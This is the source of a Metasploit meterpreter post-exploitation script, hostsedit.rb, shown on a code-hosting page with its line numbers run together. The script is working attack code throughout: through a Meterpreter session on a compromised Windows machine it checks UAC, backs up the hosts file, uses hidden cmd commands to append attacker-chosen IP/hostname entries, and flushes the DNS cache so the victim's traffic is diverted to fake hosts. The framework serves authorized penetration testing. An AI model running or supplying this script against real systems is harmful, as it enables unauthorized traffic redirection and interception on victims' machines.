Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/scripts/meterpreter/hostsedit.rb
Views: 11766
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##5678# Meterpreter script for modifying the hosts file in windows9# given a single entry or several in a file and clear the10# DNS cache on the target machine.11# This script works with Windows 2000,Windows XP,Windows 2003,12# Windows Vista and Windows 2008.13# Provided: carlos_perez[at]darkoperator[dot]com14# Version: 0.1.015# Note: in Vista UAC must be disabled to be able to perform hosts16# file modifications.17################## Variable Declarations ##################18session = client19# Setting Arguments20@@exec_opts = Rex::Parser::Arguments.new(21"-h" => [ false, "Help Options." ],22"-e" => [ true, "Host entry in the format of IP,Hostname." ],23"-l" => [ true, "Text file with list of entries in the format of IP,Hostname. One per line." ]24)25def usage26print_line("This Meterpreter script is for adding entries in to the Windows Hosts file.")27print_line("Since Windows will check first the Hosts file instead of the configured DNS Server")28print_line("it will assist in diverting traffic to the fake entry or entries. Either a single")29print_line("entry can be provided or a series of entries provided a file with one per line.")30print_line(@@exec_opts.usage)31print_line("Example:\n\n")32print_line("run hostsedit -e 127.0.0.1,google.com\n")33print_line("run hostsedit -l /tmp/fakednsentries.txt\n\n")34raise Rex::Script::Completed35end363738record = ""39#Set path to the hosts file40hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"41#Function check if UAC is enabled42def checkuac(session)43winver = session.sys.config.sysinfo44if winver["OS"] =~ (/Windows 7|Vista/)45print_status("Checking if UAC is enabled.")46open_key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", KEY_READ)47value = open_key.query_value("EnableLUA").data48if value == 149print_status("\tUAC is enabled")50raise "Unable to continue UAC is enabbled."51else52print_status("\tUAC is disabled")53status = false54end55end56end57#Function for adding record to hosts file58def add2hosts(session,record,hosts)59ip,host = record.split(",")60print_status("Adding Record for Host #{host} with IP #{ip}")61session.sys.process.execute("cmd /c echo #{ip}\t#{host} >> #{hosts}",nil, {'Hidden' => true})62end6364#Make a backup of the hosts file on the target65def backuphosts(session,hosts)66random = sprintf("%.5d",rand(100000))67print_status("Making Backup of the hosts file.")68session.sys.process.execute("cmd /c copy #{hosts} #{hosts}#{random}.back",nil, {'Hidden' => true})69print_status("Backup loacated in #{hosts}#{random}.back")70end71# Clear DNS Cached entries72def cleardnscach(session)73print_status("Clearing the DNS Cache")74session.sys.process.execute("cmd /c ipconfig /flushdns",nil, {'Hidden' => true})75end76if client.platform == 'windows'77@@exec_opts.parse(args) { |opt, idx, val|78case opt79when "-e"80checkuac(session)81backuphosts(session,hosts)82add2hosts(session,val,hosts)83cleardnscach(session)84when "-l"85checkuac(session)86if not ::File.exist?(val)87raise "File #{val} does not exist!"88else89backuphosts(session,hosts)90::File.open(val, "r").each_line do |line|91next if line.strip.length < 192next if line[0,1] == "#"93add2hosts(session,line.chomp,hosts)94end95cleardnscach(session)96end97when "-h"98usage99end100}101if args.length == 0102usage103end104else105print_error("This version of Meterpreter is not supported with this Script!")106raise Rex::Script::Completed107end108109110